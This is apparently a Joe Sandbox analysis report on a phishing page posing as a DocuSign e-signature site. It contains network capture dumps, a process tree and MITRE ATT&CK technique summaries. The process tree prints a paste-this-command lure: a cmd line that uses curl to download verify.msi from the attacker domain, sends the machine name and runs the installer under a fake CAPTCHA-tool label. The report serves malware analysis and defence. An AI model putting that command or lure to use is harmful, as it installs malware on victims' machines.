2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 66 69 78 7b 74 6f 70 3a 30 3b 6c 65 66 74 3a 2e 34 33 37 35 65 6d 3b 77 69 64 74 68 3a 2e 34 33 37 35 65 6d 3b 68 65 69 67 68 74 3a 32 2e 36 38 37 35 65 6d 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 5b 63 6c 61 73 73 5e 3d 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 6c 69 6e 65 5d 7b 68 65 69 67 68 74 3a 2e 33 31 32 35 65 6d 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 5b 63 6c 61 73 73 5e 3d 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 6c 69 6e 65 5d Data Ascii: al2-popup.swal2-toast .swal2-success .swal2-success-fix{top:0;left:.4375em;width:.4375em;height:2.6875em}.swal2-popup.swal2-toast .swal2-success [class^=swal2-success-line]{height:.3125em}.swal2-popup.swal2-toast .swal2-success [class^=swal2-success-line]
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 29 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 62 61 63 6b 64 72 6f 70 2d 68 69 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 74 6f 70 2d 73 74 61 72 74 2c 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 63 65 6e 74 65 72 2d 73 74 61 72 74 2c 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 62 6f 74 74 6f 6d 2d 73 74 61 72 74 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 6d 69 6e 6d 61 78 28 30 2c 20 31 66 72 29 20 61 75 74 6f 20 61 75 74 6f 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 Data Ascii: rgba(0,0,0,.4)}.swal2-container.swal2-backdrop-hide{background:rgba(0,0,0,0) !important}.swal2-container.swal2-top-start,.swal2-container.swal2-center-start,.swal2-container.swal2-bottom-start{grid-template-columns:minmax(0, 1fr) auto auto}.swal2-containe
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 70 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 67 72 69 64 2d 72 6f 77 3a 33 3b 6a 75 73 74 69 66 79 2d 73 65 6c 66 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 65 6e 64 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 62 6f 74 74 6f 6d 2d 65 6e 64 3e 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2c 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 3e 2e 73 77 61 6c 32 2d 70 6f 70 75 70 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 33 3b 67 72 69 64 2d 72 6f 77 3a 33 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 65 6e 64 3b 6a 75 73 74 69 66 79 2d 73 65 6c 66 3a 65 6e 64 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 67 72 6f 77 2d 72 6f 77 3e 2e 73 77 61 6c 32 2d 70 Data Ascii: p{grid-column:2;grid-row:3;justify-self:center;align-self:end}.swal2-container.swal2-bottom-end>.swal2-popup,.swal2-container.swal2-bottom-right>.swal2-popup{grid-column:3;grid-row:3;align-self:end;justify-self:end}.swal2-container.swal2-grow-row>.swal2-p
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 29 7d 2e 73 77 61 6c 32 2d 61 63 74 69 6f 6e 73 3a 6e 6f 74 28 2e 73 77 61 6c 32 2d 6c 6f 61 64 69 6e 67 29 20 2e 73 77 61 6c 32 2d 73 74 79 6c 65 64 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 2c 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 29 7d 2e 73 77 61 6c 32 2d 6c 6f 61 64 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 32 2e 32 65 6d 3b 68 65 69 67 68 74 3a 32 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 31 2e 38 37 35 65 6d Data Ascii: (0, 0, 0, 0.1))}.swal2-actions:not(.swal2-loading) .swal2-styled:active{background-image:linear-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0.2))}.swal2-loader{display:none;align-items:center;justify-content:center;width:2.2em;height:2.2em;margin:0 1.875em
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 31 65 6d 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 31 65 6d 20 31 65 6d 20 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 73 77 61 6c 32 2d 74 69 6d 65 72 2d 70 72 6f 67 72 65 73 73 2d 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 35 70 Data Ascii: y-content:center;margin:1em 0 0;padding:1em 1em 0;border-top:1px solid #eee;color:inherit;font-size:1em}.swal2-timer-progress-bar-container{position:absolute;right:0;bottom:0;left:0;grid-column:auto !important;overflow:hidden;border-bottom-right-radius:5p
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 2e 31 73 2c 62 6f 78 2d 73 68 61 64 6f 77 20 2e 31 73 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 31 38 37 35 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 36 29 2c 30 20 30 20 30 20 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 73 77 61 6c 32 2d 69 6e 70 75 74 2e 73 77 61 6c 32 2d 69 6e 70 75 74 65 72 72 6f 72 2c 2e 73 77 61 6c 32 2d 66 69 6c 65 2e 73 77 61 6c 32 2d 69 6e 70 Data Ascii: :border-color .1s,box-shadow .1s;border:1px solid #d9d9d9;border-radius:.1875em;background:rgba(0,0,0,0);box-shadow:inset 0 1px 1px rgba(0,0,0,.06),0 0 0 3px rgba(0,0,0,0);color:inherit;font-size:1.125em}.swal2-input.swal2-inputerror,.swal2-file.swal2-inp
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 64 69 6f 20 69 6e 70 75 74 2c 2e 73 77 61 6c 32 2d 63 68 65 63 6b 62 6f 78 20 69 6e 70 75 74 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 6d 61 72 67 69 6e 3a 30 20 2e 34 65 6d 7d 2e 73 77 61 6c 32 2d 69 6e 70 75 74 2d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 31 65 6d 20 61 75 74 6f 20 30 7d 2e 73 77 61 6c 32 2d 76 61 6c 69 64 61 74 69 6f 6e 2d 6d 65 73 73 61 67 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 31 65 6d 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 2e 36 32 35 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 62 61 63 6b 67 72 6f 75 Data Ascii: dio input,.swal2-checkbox input{flex-shrink:0;margin:0 .4em}.swal2-input-label{display:flex;justify-content:center;margin:1em auto 0}.swal2-validation-message{align-items:center;justify-content:center;margin:1em 0 0;padding:.625em;overflow:hidden;backgrou
2025-03-21 17:44:30 UTC	1378	IN	Data Raw: 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 65 72 72 6f 72 2e 73 77 61 6c 32 2d 69 63 6f 6e 2d 73 68 6f 77 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 77 61 6c 32 2d 61 6e 69 6d 61 74 65 2d 65 72 72 6f 72 2d 69 63 6f 6e 20 2e 35 73 7d 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 65 72 72 6f 72 2e 73 77 61 6c 32 2d 69 63 6f 6e 2d 73 68 6f 77 20 2e 73 77 61 6c 32 2d 78 2d 6d 61 72 6b 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 77 61 6c 32 2d 61 6e 69 6d 61 74 65 2d 65 72 72 6f 72 2d 78 2d 6d 61 72 6b 20 2e 35 73 7d 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 77 61 72 6e 69 6e 67 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 61 63 65 61 38 3b 63 6f 6c 6f 72 3a 23 66 38 62 62 38 36 7d 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 77 61 72 Data Ascii: swal2-icon.swal2-error.swal2-icon-show{animation:swal2-animate-error-icon .5s}.swal2-icon.swal2-error.swal2-icon-show .swal2-x-mark{animation:swal2-animate-error-x-mark .5s}.swal2-icon.swal2-warning{border-color:#facea8;color:#f8bb86}.swal2-icon.swal2-war

Timestamp	Bytes transferred	Direction	Data
2025-03-21 17:44:30 UTC	708	OUT	GET /intl/en_us/badges/static/images/badges/en_badge_web_generic.png HTTP/1.1 Host: play.google.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CO6MywE= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://account.esign.us.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-21 17:44:30 UTC	831	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/play_google Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/play_google" Report-To: {"group":"uxe-owners-acl/play_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/play_google"}]} Content-Length: 4904 Date: Fri, 21 Mar 2025 17:44:30 GMT Expires: Fri, 21 Mar 2025 17:44:30 GMT Cache-Control: private, max-age=0 Last-Modified: Thu, 04 Aug 2022 06:08:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-21 17:44:30 UTC	389	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 86 00 00 00 fa 08 03 00 00 00 0b 2b 76 d8 00 00 01 dd 50 4c 54 45 47 70 4c 57 57 57 5e 5e 5e 66 66 66 6e 6e 6e 61 61 61 78 78 78 94 94 94 a6 a6 a6 8d 8d 8d 73 73 73 5c 5c 5c 9d 9d 9d 84 84 84 92 92 92 68 68 68 49 49 49 2a 2a 2a 15 15 15 00 00 00 1f 1f 1f 73 73 73 9c 9c 9c 34 34 34 7d 7d 7d 87 87 87 3e 3e 3e 53 53 53 59 59 59 6a 6a 6a 0a 0a 0a 7d 7d 7d 5e 5e 5e 20 20 20 40 40 40 70 70 70 10 10 10 80 80 80 60 60 60 30 30 30 50 50 50 07 15 0a 17 4a 24 1d 5f 2f 27 7e 3e 24 74 39 1a 54 2a 10 35 1a b3 b3 b3 e6 e6 e6 ea ea ea ff ff ff e2 e2 e2 91 91 91 dd dd dd f2 f2 f2 c5 c5 c5 ec ec ec f8 f8 f8 e3 e3 e3 ee ee ee d9 d9 d9 2a 89 44 34 a8 53 31 9e 4e 03 0b 05 d1 d1 d1 f3 f3 f3 9f 9f 9f d5 d5 d5 ef ef ef f7 Data Ascii: PNGIHDR+vPLTEGpLWWW^^^fffnnnaaaxxxsss\\\hhhIII**sss444}}}>>>SSSYYYjjj}}}^^^ @@@ppp```000PPPJ$_/'~>$t9T5*D4S1N
2025-03-21 17:44:30 UTC	1220	IN	Data Raw: 3f a9 4e bd 8e 03 9d 76 03 40 a9 4e 4f 3b 01 8e 6a 02 90 90 90 a0 a0 a0 cd 99 03 b0 b0 b0 d0 d0 d0 3c a8 54 2f 23 01 35 a6 5c b9 b0 37 4c 81 e9 c5 78 4b ca 4f 59 ea 43 35 f0 71 23 e8 6e 21 b0 32 28 39 18 0a ce 3b 2f 49 15 11 dc 3f 32 75 22 1b 93 2a 21 0f 04 03 3b 11 0d 58 19 14 a2 2e 25 1d 08 07 4b 81 e9 bf 37 2b 49 80 e8 67 1d 17 84 26 1e 2c 0d 0a 48 80 e8 47 80 e8 45 7f e7 46 46 75 87 d0 61 1d 00 00 00 20 74 52 4e 53 00 3a af d9 ef c7 fa ff ff ff f6 90 ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff 6a e6 ff fd 4e 7d ae 0a 00 00 10 da 49 44 41 54 78 01 ec d8 55 62 eb 40 10 45 c1 91 49 37 31 ca 82 30 ec 7f 93 8f 19 43 e3 af aa 35 9c 81 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f a0 99 cd 17 5f c0 72 d6 94 93 5b ae Data Ascii: ?Nv@NO;j<T/#5\7LxKOYC5q#n!2(9;/I?2u"*!;X.%K7+Ig&,HGEFFua tRNS:jN}IDATxUb@EI710C5?_r[
2025-03-21 17:44:30 UTC	1220	IN	Data Raw: 72 38 31 e0 f4 12 38 e3 63 e8 19 7e df 61 6b a9 f6 fb 86 e2 78 90 3f 8b fa ee 1b 0e 4a ee 1b be 96 0c b8 00 c0 cb d0 33 ac 76 68 2f 67 d7 79 fb fa 5a 37 00 a0 1b 59 15 41 91 fc 11 86 c5 ed eb b7 36 75 06 00 eb aa 64 40 34 60 67 e8 19 ba 0e 59 cf f7 c2 04 6e e6 8b f7 a2 fc 00 c3 b2 f7 a2 9c 1d ab d2 01 bd 43 76 86 9e a1 eb 90 f5 7c cf 7d 67 5e 63 45 51 ad 0c c7 df 99 17 7e 31 40 19 7e 86 9e 61 b9 43 9e cb d9 72 df dc 22 4f eb 6b 41 9f 99 df 67 98 55 33 cc 93 07 a5 ef 53 36 ce 00 8a 37 80 8c 99 a1 67 e8 3a e4 3e df 13 52 c6 52 2a 07 8b 9b 28 d6 da 27 a7 48 4a 49 55 8b 8a c5 f1 e8 72 bb e1 f8 b3 22 d6 3c 43 d7 61 45 57 b3 7f b1 73 17 46 0c 03 31 00 04 8b 50 07 3f 94 be 82 66 a6 ee c3 8c 9a c8 c1 bb 1a d6 f0 28 d4 4b 30 7c dc e1 fb ae 78 f8 e5 60 a8 77 68 bf Data Ascii: r818c~akx?J3vh/gyZ7YA6ud@4`gYnCv\|}g^cEQ~1@~aCr"OkAgU3S67g:>RR*('HJIUr"<CaEWsF1P?f(K0\|x`wh
2025-03-21 17:44:30 UTC	1220	IN	Data Raw: fb 55 6b f9 c1 37 e1 60 5d 3b 43 54 28 75 f8 1b 38 f6 f5 b8 0c 27 0a 06 63 4c 3f 72 c0 f0 83 4c ff 6d 96 f1 76 0d 53 e6 e3 63 36 c6 84 83 0c 07 5c 79 db a6 eb 23 0e f7 45 86 d9 5c 66 fa 94 7b 86 2b 20 0d c6 58 93 d3 b4 1c 49 27 6e 6e 6d b1 49 ed 0c 51 a1 d4 e1 1f 7e 41 74 7c 86 76 3a 88 26 a3 cf 2d 05 bf f3 d3 60 d8 dd 0e dc 8d 57 ff 4e cf 8b ad 7c 38 a7 a9 4d 99 e1 74 4a 97 2c 9d c5 26 7c 74 9e 61 31 23 d7 6b b6 97 a3 ae 9a 3f 86 8f e8 34 71 0b 94 a4 eb 67 08 0a 05 0e e1 bc d7 e3 33 34 38 0b f7 a3 e6 86 d6 bc f3 2f 34 77 d7 66 de cc 30 2b 20 96 61 c0 c7 9f df 22 2f 66 18 35 3f 78 77 f3 ca 73 3d e2 ba 44 31 1d 9f c2 fe b5 72 86 a8 50 e6 50 7e fa 35 c3 46 2d 65 98 39 85 38 b8 aa 69 2f 97 f9 c7 4d b3 32 1f cb ac c4 59 86 0d 3e 7e f9 f5 48 19 8e aa 38 87 54 Data Ascii: Uk7`];CT(u8'cL?rLmvSc6\y#E\f{+ XI'nnmIQ~At\|v:&-`WN\|8MtJ,&\|ta1#k?4qg348/4wf0+ a"/f5?xws=D1rPP~5F-e98i/M2Y>~H8T
2025-03-21 17:44:30 UTC	855	IN	Data Raw: 85 ef 9f d1 71 e3 46 bf 3f c9 ce e5 ca 14 08 b7 cb e7 c5 0c f5 28 53 78 03 86 3a 0a 19 e2 b4 c2 d6 c9 50 a0 f0 fe 07 3a 7e 8c 17 fc 95 4d 4c 73 b3 c3 43 7a 9a 24 2f 65 48 3a 14 15 ae c3 90 ef f2 87 c0 31 34 78 b5 a6 42 86 1f bf 92 95 73 1d 3f aa 2c 21 19 f9 51 4a 66 87 ab ec 28 25 bb f8 28 25 ea 0b df 82 75 18 f2 0e 47 cd 32 d4 09 5e 7e 7d 0c 3f 7d b5 42 39 d7 7a 10 13 8f 50 cb 0f 96 73 dc c1 72 22 2b 2a 2c 3c 58 0e 57 dd b8 a8 5d 91 21 e9 61 67 13 1f cb 50 f9 f3 a8 ea 18 82 42 59 39 d7 f1 a3 ed 30 37 98 3b 2a 47 b7 a3 a4 d2 45 99 28 29 91 6e 06 7c 5c 4d 13 86 0e ce dc c4 9b c8 ea 5e c3 79 1c 61 24 ed f0 11 c6 8e 88 fa 70 96 42 51 70 75 0c bf 07 0a c5 e5 5c c7 4f d3 f6 e1 2c 83 b1 8e 0e 45 b5 7d 10 9c fa eb da 2c 38 9b 58 db fe cc 5a 87 c7 bc 65 12 9c 53 Data Ascii: qF?(Sx:P:~MLsCz$/eH:14xBs?,!QJf(%(%uG2^~}?}B9zPsr"+,<XW]!agPBY907;GE()n\|\M^ya$pBQpu\O,E},8XZeS

Target ID:	2
Start time:	13:44:16
Start date:	21/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	13:44:22
Start date:	21/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	12
Start time:	13:44:27
Start date:	21/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	14
Start time:	13:44:42
Start date:	21/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
Imagebase:	0x2a0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\verify.msi

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

